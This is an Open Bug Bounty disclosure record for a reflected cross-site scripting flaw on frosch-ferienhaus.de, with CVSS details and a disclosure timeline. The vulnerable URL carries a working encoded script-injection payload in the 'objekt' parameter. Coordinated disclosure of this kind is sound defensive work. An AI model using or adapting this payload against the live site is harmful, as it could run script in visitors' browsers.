frosch-ferienhaus.de XSS vulnerability

2017-11-28T02:41:00
ID OBB:440348
Type openbugbounty
Reporter deb_security
Modified 2018-02-26T02:41:00

Description

Open Bug Bounty ID: OBB-440348

Description| Value
---|---
Affected Website:| frosch-ferienhaus.de
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
https://www.frosch-ferienhaus.de/index.php?id=151&mode;=2&objekt;=%22%3E%3Csvg%3E%3Cscript%3E/%3C@/%3Eprompt(/OPENBUGBOUNTY/)%3C/script%3E&ort2;=&gebiet2;=&region;=&land;=&sql;_sort=(Entfernung,1)&sort;=&Produktlinie;=1&themenids;=6208,6178,4662,7426,7427,7428,7425,7429,7435,7430,7431,7432,4161,936,136,2805,3105,6111,1003,99,104,2342,6442,100,7218,3694,2806,3106,337,874,6746,7069,3447,4615,216,217,615,3722,7319,7325,7326,7327,7328,7329,816,7330,7331,7332,7333,7341,7342,7343,7344,7345,7346,7347,7348,7349,7350,7351,7353,7354,7355,7356,7358,7359,7360,7361,7362,133,4639,7363,7364,7365,7366,4946,7404,4959,4960,220,4162,4961,221,4962,5283,4661,4212,6112,7103,7403,6556,4876,6551,6552,4616,7421,7100,7383,5652,4613,6553,2608,4690,3700,3701,982,3702,833,5757,4160,6737,4159,7083,7323,996,649,3720,357,340,3450,7405&thema;=194&backto;=/index.php?id=682&va;=&Personen;=&Anreisetag;=&Abreisetag;=&KleinKinder;=
Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 28 November, 2017 02:41 GMT
Vulnerability Verified:| 28 November, 2017 02:44 GMT
Website Operator Notified:| 28 November, 2017 02:44 GMT
Vulnerability Published:| 28 November, 2017 02:44 GMT[without any technical details]
Public Disclosure:| 26 February, 2018 02:41 GMT